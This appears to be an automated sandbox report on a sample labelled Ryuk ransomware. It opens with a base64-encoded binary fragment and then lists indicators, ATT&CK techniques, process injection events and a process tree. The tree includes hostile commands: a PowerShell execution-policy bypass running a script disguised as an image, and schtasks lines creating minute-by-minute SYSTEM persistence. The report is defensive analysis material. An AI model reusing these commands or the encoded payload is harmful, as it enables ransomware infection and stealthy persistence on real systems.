8MEM8D/FQSgABCQkDllsHQXaIgBAABoExUCBGgGAAAA6L4kAACDxAyLXaxTi32oiwODwwSJB4PHBFeLP1NmiwODwwKJB4PHBGaLA4PDAokHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEZosDg8MCiQeDxwRmiwODwwKJB4PHBFuBwxQAAABfg8cEV4s/U2aLA4PDAokHg8cEigNDiQeDxwSKA0OJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBGaLA4PDAokHg8cEZosDg8MCiQeDxwRmiwODwwKJB4PHBGaLA4PDAokHg8cEZosDg8MCiQeDxwRmiwODwwKJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwRmiwODwwKJB4PHBGaLA4PDAokHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEV4s/uRAAAACBxwgAAABTV1GLP4sDg8MEiQeDxwSLA4PDBIkHg8cEWV9bg8cEgcMIAAAASQ+F1P///1+DxwRbgcPgAAAAX4PHBOjaIgAAg8QEi134iV3Yi13YgTtQRQAAD4QKAAAAuAAAAADpvxkAAItd9Ild2Ill1ItF9FBoRAAAAOinIgAAg8QEi/hbUIldzIlF0IsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEZokHg8cCiwODwwRmiQeDxwKLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEM8D/FQCgABCQkDll1HQXaBwCAABoExUCBGgGAAAA6K8hAACDxAxQi13QU4t9zIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8ME

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

Blocklisted process makes network request 1 IoCs

flow	pid	Process
8	4648	powershell.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4836-305-0x0000000000400000-0x0000000000A16000-memory.dmp	upx
behavioral2/memory/4836-306-0x0000000000400000-0x0000000000A16000-memory.dmp	upx

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	PowerShell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log	PowerShell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	PowerShell.exe
File created	C:\Windows\SysWOW64\FileDriver.sys	mmc.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	PowerShell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PowerShell.exe.log	PowerShell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	PowerShell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4072 set thread context of 3872	4072	PowerShell.exe	92
PID 4072 set thread context of 4504	4072	PowerShell.exe	93
PID 4504 set thread context of 3160	4504	svchost.exe	94
PID 3160 set thread context of 4836	3160	svchost.exe	101
PID 3160 set thread context of 2704	3160	svchost.exe	103

Program crash 3 IoCs

pid	pid_target	Process	procid_target
4600	2604	WerFault.exe	84
4600	4836	WerFault.exe	101
3120	2704	WerFault.exe	103

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3684	schtasks.exe
676	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	PowerShell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	PowerShell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	PowerShell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	PowerShell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4648	powershell.exe
4648	powershell.exe
4648	powershell.exe
2604	PowerShell.exe
2604	PowerShell.exe
2604	PowerShell.exe
4072	PowerShell.exe
4072	PowerShell.exe
4600	WerFault.exe
4600	WerFault.exe
4600	WerFault.exe
4600	WerFault.exe
4600	WerFault.exe
4600	WerFault.exe
4600	WerFault.exe
4600	WerFault.exe
4600	WerFault.exe
4600	WerFault.exe
4600	WerFault.exe
4600	WerFault.exe
4600	WerFault.exe
4600	WerFault.exe
4600	WerFault.exe
4072	PowerShell.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
3160	svchost.exe
3160	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
3160	svchost.exe
3160	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
3160	svchost.exe
3160	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe
4504	svchost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
616	Process not Found

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeDebugPrivilege	2604	PowerShell.exe
Token: SeDebugPrivilege	4072	PowerShell.exe
Token: SeDebugPrivilege	4600	WerFault.exe
Token: SeDebugPrivilege	4876	PowerShell.exe
Token: SeDebugPrivilege	3796	PowerShell.exe
Token: SeDebugPrivilege	3160	svchost.exe
Token: SeDebugPrivilege	3160	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4504	svchost.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 4648 wrote to memory of 3684	4648	powershell.exe	75
PID 4648 wrote to memory of 3684	4648	powershell.exe	75
PID 4648 wrote to memory of 676	4648	powershell.exe	79
PID 4648 wrote to memory of 676	4648	powershell.exe	79
PID 4072 wrote to memory of 2328	4072	PowerShell.exe	90
PID 4072 wrote to memory of 2328	4072	PowerShell.exe	90
PID 4072 wrote to memory of 2328	4072	PowerShell.exe	90
PID 4072 wrote to memory of 2300	4072	PowerShell.exe	91
PID 4072 wrote to memory of 2300	4072	PowerShell.exe	91
PID 4072 wrote to memory of 2300	4072	PowerShell.exe	91
PID 4072 wrote to memory of 3872	4072	PowerShell.exe	92
PID 4072 wrote to memory of 3872	4072	PowerShell.exe	92
PID 4072 wrote to memory of 3872	4072	PowerShell.exe	92
PID 4072 wrote to memory of 3872	4072	PowerShell.exe	92
PID 4072 wrote to memory of 3872	4072	PowerShell.exe	92
PID 4072 wrote to memory of 3872	4072	PowerShell.exe	92
PID 4072 wrote to memory of 3872	4072	PowerShell.exe	92
PID 4072 wrote to memory of 3872	4072	PowerShell.exe	92
PID 4072 wrote to memory of 4504	4072	PowerShell.exe	93
PID 4072 wrote to memory of 4504	4072	PowerShell.exe	93
PID 4072 wrote to memory of 4504	4072	PowerShell.exe	93
PID 4072 wrote to memory of 4504	4072	PowerShell.exe	93
PID 4072 wrote to memory of 4504	4072	PowerShell.exe	93
PID 4072 wrote to memory of 4504	4072	PowerShell.exe	93
PID 4072 wrote to memory of 4504	4072	PowerShell.exe	93
PID 4072 wrote to memory of 4504	4072	PowerShell.exe	93
PID 4072 wrote to memory of 4504	4072	PowerShell.exe	93
PID 4504 wrote to memory of 3160	4504	svchost.exe	94
PID 4504 wrote to memory of 3160	4504	svchost.exe	94
PID 4504 wrote to memory of 3160	4504	svchost.exe	94
PID 4504 wrote to memory of 3160	4504	svchost.exe	94
PID 4504 wrote to memory of 3160	4504	svchost.exe	94
PID 4504 wrote to memory of 3160	4504	svchost.exe	94
PID 4504 wrote to memory of 3160	4504	svchost.exe	94
PID 4504 wrote to memory of 3160	4504	svchost.exe	94
PID 4504 wrote to memory of 3160	4504	svchost.exe	94
PID 3160 wrote to memory of 4836	3160	svchost.exe	101
PID 3160 wrote to memory of 4836	3160	svchost.exe	101
PID 3160 wrote to memory of 4836	3160	svchost.exe	101
PID 3160 wrote to memory of 4836	3160	svchost.exe	101
PID 3160 wrote to memory of 4836	3160	svchost.exe	101
PID 3160 wrote to memory of 4836	3160	svchost.exe	101
PID 3160 wrote to memory of 4836	3160	svchost.exe	101
PID 3160 wrote to memory of 4836	3160	svchost.exe	101
PID 3160 wrote to memory of 2704	3160	svchost.exe	103
PID 3160 wrote to memory of 2704	3160	svchost.exe	103
PID 3160 wrote to memory of 2704	3160	svchost.exe	103
PID 3160 wrote to memory of 2704	3160	svchost.exe	103
PID 3160 wrote to memory of 2704	3160	svchost.exe	103
PID 3160 wrote to memory of 2704	3160	svchost.exe	103
PID 3160 wrote to memory of 2704	3160	svchost.exe	103

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\cs.jpg.ps1
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4648
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /tn \Microsoft\Windows\UPnPcwmipcnew\Services /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe -ExecutionPolicy Bypass -File C:\Users\Public\msf.ps1"
  2⤵
  - Creates scheduled task(s)
  PID:3684
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /tn \Microsoft\Windows\UPnPcwmiob32\Services /tr "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -ExecutionPolicy Bypass -File C:\Users\Public\msf.ps1"
  2⤵
  - Creates scheduled task(s)
  PID:676

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4172

C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -ExecutionPolicy Bypass -File C:\Users\Public\msf.ps1
1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2604 -s 1920
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4600

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe -ExecutionPolicy Bypass -File C:\Users\Public\msf.ps1
1⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4072
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:2328
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe
  2⤵
  PID:2300
- C:\Windows\SysWOW64\mmc.exe
  mmc.exe
  2⤵
  - Drops file in System32 directory
  PID:3872
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4504
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe
    3⤵
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3160
  - - C:\Windows\notepad.exe
      "C:\Windows\notepad.exe" -c "C:\ProgramData\xidAHBXFQg\cfgi"
      4⤵
      PID:4836
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4836 -s 180
        5⤵
        Program crash
        
        PID:4600
  - - C:\Windows\notepad.exe
      "C:\Windows\notepad.exe" -c "C:\ProgramData\xidAHBXFQg\cfgi"
      4⤵
      PID:2704
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2704 -s 180
        5⤵
        Program crash
        
        PID:3120

C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -ExecutionPolicy Bypass -File C:\Users\Public\msf.ps1
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe -ExecutionPolicy Bypass -File C:\Users\Public\msf.ps1
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3796

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4692

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4972

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2604-198-0x000001BA378E6000-0x000001BA378E8000-memory.dmp

Filesize
8KB

Download
memory/2604-179-0x000001BA378E0000-0x000001BA378E2000-memory.dmp

Filesize
8KB

Download
memory/2604-180-0x000001BA378E3000-0x000001BA378E5000-memory.dmp

Filesize
8KB

Download
memory/3160-248-0x0000000000400000-0x00000000005D4000-memory.dmp

Filesize
1.8MB

Download
memory/3160-241-0x0000000000400000-0x00000000005D4000-memory.dmp

Filesize
1.8MB

Download
memory/3160-243-0x0000000000400000-0x00000000005D4000-memory.dmp

Filesize
1.8MB

Download
memory/3160-242-0x0000000000400000-0x00000000005D4000-memory.dmp

Filesize
1.8MB

Download
memory/3796-304-0x0000000000E73000-0x0000000000E74000-memory.dmp

Filesize
4KB

Download
memory/3796-286-0x0000000000E70000-0x0000000000E71000-memory.dmp

Filesize
4KB

Download
memory/3796-289-0x00000000066F0000-0x00000000066F1000-memory.dmp

Filesize
4KB

Download
memory/3796-281-0x00000000060F0000-0x00000000060F1000-memory.dmp

Filesize
4KB

Download
memory/3796-287-0x0000000000E72000-0x0000000000E73000-memory.dmp

Filesize
4KB

Download
memory/3872-223-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/3872-224-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/3872-229-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/3872-225-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/4072-218-0x0000000007C90000-0x0000000007C91000-memory.dmp

Filesize
4KB

Download
memory/4072-230-0x0000000009480000-0x0000000009B6C000-memory.dmp

Filesize
6.9MB

Download
memory/4072-219-0x0000000008F80000-0x0000000008F81000-memory.dmp

Filesize
4KB

Download
memory/4072-222-0x0000000003363000-0x0000000003364000-memory.dmp

Filesize
4KB

Download
memory/4072-217-0x0000000007F80000-0x0000000007F81000-memory.dmp

Filesize
4KB

Download
memory/4072-193-0x00000000056F0000-0x00000000056F1000-memory.dmp

Filesize
4KB

Download
memory/4072-212-0x0000000007BB0000-0x0000000007BB1000-memory.dmp

Filesize
4KB

Download
memory/4072-211-0x0000000008400000-0x0000000008401000-memory.dmp

Filesize
4KB

Download
memory/4072-206-0x0000000006E70000-0x0000000006E71000-memory.dmp

Filesize
4KB

Download
memory/4072-202-0x0000000006530000-0x0000000006531000-memory.dmp

Filesize
4KB

Download
memory/4072-194-0x0000000005D60000-0x0000000005D61000-memory.dmp

Filesize
4KB

Download
memory/4072-195-0x0000000003360000-0x0000000003361000-memory.dmp

Filesize
4KB

Download
memory/4072-196-0x0000000003362000-0x0000000003363000-memory.dmp

Filesize
4KB

Download
memory/4072-197-0x0000000005C80000-0x0000000005C81000-memory.dmp

Filesize
4KB

Download
memory/4072-205-0x0000000006C10000-0x0000000006C11000-memory.dmp

Filesize
4KB

Download
memory/4072-199-0x0000000006400000-0x0000000006401000-memory.dmp

Filesize
4KB

Download
memory/4072-204-0x00000000065C0000-0x00000000065C1000-memory.dmp

Filesize
4KB

Download
memory/4072-203-0x0000000006780000-0x0000000006781000-memory.dmp

Filesize
4KB

Download
memory/4504-238-0x0000000000400000-0x0000000000A15000-memory.dmp

Filesize
6.1MB

Download
memory/4504-233-0x0000000000400000-0x0000000000A15000-memory.dmp

Filesize
6.1MB

Download
memory/4504-232-0x0000000000400000-0x0000000000A15000-memory.dmp

Filesize
6.1MB

Download
memory/4504-231-0x0000000000400000-0x0000000000A15000-memory.dmp

Filesize
6.1MB

Download
memory/4504-240-0x000000007EF30000-0x000000007F301000-memory.dmp

Filesize
3.8MB

Download
memory/4648-126-0x000001921A3C0000-0x000001921A3C1000-memory.dmp

Filesize
4KB

Download
memory/4648-120-0x000001927F643000-0x000001927F645000-memory.dmp

Filesize
8KB

Download
memory/4648-119-0x000001927F640000-0x000001927F642000-memory.dmp

Filesize
8KB

Download
memory/4648-121-0x000001921A210000-0x000001921A211000-memory.dmp

Filesize
4KB

Download
memory/4648-131-0x000001927F646000-0x000001927F648000-memory.dmp

Filesize
8KB

Download
memory/4836-305-0x0000000000400000-0x0000000000A16000-memory.dmp

Filesize
6.1MB

Download
memory/4836-306-0x0000000000400000-0x0000000000A16000-memory.dmp

Filesize
6.1MB

Download
memory/4876-285-0x000002181CAE6000-0x000002181CAE8000-memory.dmp

Filesize
8KB

Download
memory/4876-283-0x000002181CAE0000-0x000002181CAE2000-memory.dmp

Filesize
8KB

Download
memory/4876-284-0x000002181CAE3000-0x000002181CAE5000-memory.dmp

Filesize
8KB

Download